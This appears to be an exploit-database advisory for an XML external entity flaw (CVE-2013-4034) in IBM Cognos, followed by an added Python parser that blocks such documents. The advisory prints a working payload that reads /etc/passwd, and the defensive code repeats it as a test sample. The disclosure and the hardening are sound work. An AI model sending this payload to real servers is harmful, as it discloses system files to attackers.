IBM Cognos Business Intelligence - XML External Entity Information Disclosure

Author: IBM
type: remote
platform: multiple
port: 
date_added: 2013-10-11  
date_updated: 2015-11-30  
verified: 1  
codes: CVE-2013-4034;OSVDB-99742  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 38825.xml  
source: https://www.securityfocus.com/bid/63719/info

IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
                <id>C970393BDF6C43E2B030D23482D88EED</id>
                <comments>&xxe;</comments>
        </Product>
</ob:Openbravo>
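Added example, not part of the advisory or of IBM's code: a parser that refuses the class of document shown above. It uses only Python's standard library (`xml.parsers.expat`) and rejects any DOCTYPE with an external identifier and any entity declared with a SYSTEM or PUBLIC id, so the `file:///etc/passwd` entity is refused at its declaration, before the `&xxe;` reference is ever reached. The two documents embedded in it are constructed samples shaped like the proof of concept; `parse_product_comments` and `is_blocked` are hypothetical helper names standing in for whatever application code consumes the uploaded XML.

```python
"""Hardened XML parsing: refuse external DTDs and external entities."""
import xml.parsers.expat

# Constructed sample with the shape of the advisory's payload: an external
# entity pointing at a local file, referenced inside <comments>.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com">
  <Product id="C970393BDF6C43E2B030D23482D88EED">
    <id>C970393BDF6C43E2B030D23482D88EED</id>
    <comments>&xxe;</comments>
  </Product>
</ob:Openbravo>
"""

# Constructed benign document of the same shape, with no DTD at all.
CLEAN_DOCUMENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<ob:Openbravo xmlns:ob="http://www.example.com">
  <Product id="C970393BDF6C43E2B030D23482D88EED">
    <id>C970393BDF6C43E2B030D23482D88EED</id>
    <comments>Restock next week &amp; notify sales</comments>
  </Product>
</ob:Openbravo>
"""


class ExternalEntityBlocked(Exception):
    """Raised when a document tries to pull in anything outside itself."""


def parse_product_comments(data):
    """Return the text of every <comments> element in an Openbravo-style
    document, refusing external DTDs and external entities.
    (Hypothetical helper name; stands in for the consuming application code.)
    """
    parser = xml.parsers.expat.ParserCreate()

    # 1. Refuse a DOCTYPE that points at an external DTD (SYSTEM/PUBLIC id).
    def start_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise ExternalEntityBlocked(
                "external DTD reference in DOCTYPE %r: %r" % (name, system_id))

    # 2. Refuse any <!ENTITY ...> declared with an external identifier. For
    #    the payload this fires on the "xxe" declaration, so the file named
    #    in it is never opened.
    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            raise ExternalEntityBlocked(
                "external entity %r -> %r" % (name, system_id))

    # 3. Belt and braces: expat only reads an external entity if this handler
    #    does so itself. Raising makes the refusal visible instead of silently
    #    dropping content.
    def external_entity_ref(context, base, system_id, public_id):
        raise ExternalEntityBlocked(
            "external entity reference to %r" % (system_id,))

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref

    comments = []
    state = {"in_comments": False, "buf": []}

    def start_element(name, attrs):
        if name == "comments":
            state["in_comments"] = True
            state["buf"] = []

    def char_data(text):
        # Character data may arrive in several chunks (e.g. around &amp;).
        if state["in_comments"]:
            state["buf"].append(text)

    def end_element(name):
        if name == "comments":
            comments.append("".join(state["buf"]))
            state["in_comments"] = False

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element

    parser.Parse(data, True)
    return comments


def is_blocked(data):
    """True if the hardened parser rejects the document."""
    try:
        parse_product_comments(data)
    except ExternalEntityBlocked:
        return True
    return False


if __name__ == "__main__":
    print("payload blocked:", is_blocked(XXE_PAYLOAD))
    print("clean comments:", parse_product_comments(CLEAN_DOCUMENT))
```

The design choice worth noting is that the refusal happens at the declaration, not at resolution: a parser that merely declines to fetch the entity still accepts the DTD, and a later code change or library upgrade can quietly turn fetching back on. Rejecting any external identifier in the DOCTYPE or in an ENTITY declaration fails closed regardless of how the underlying library is configured.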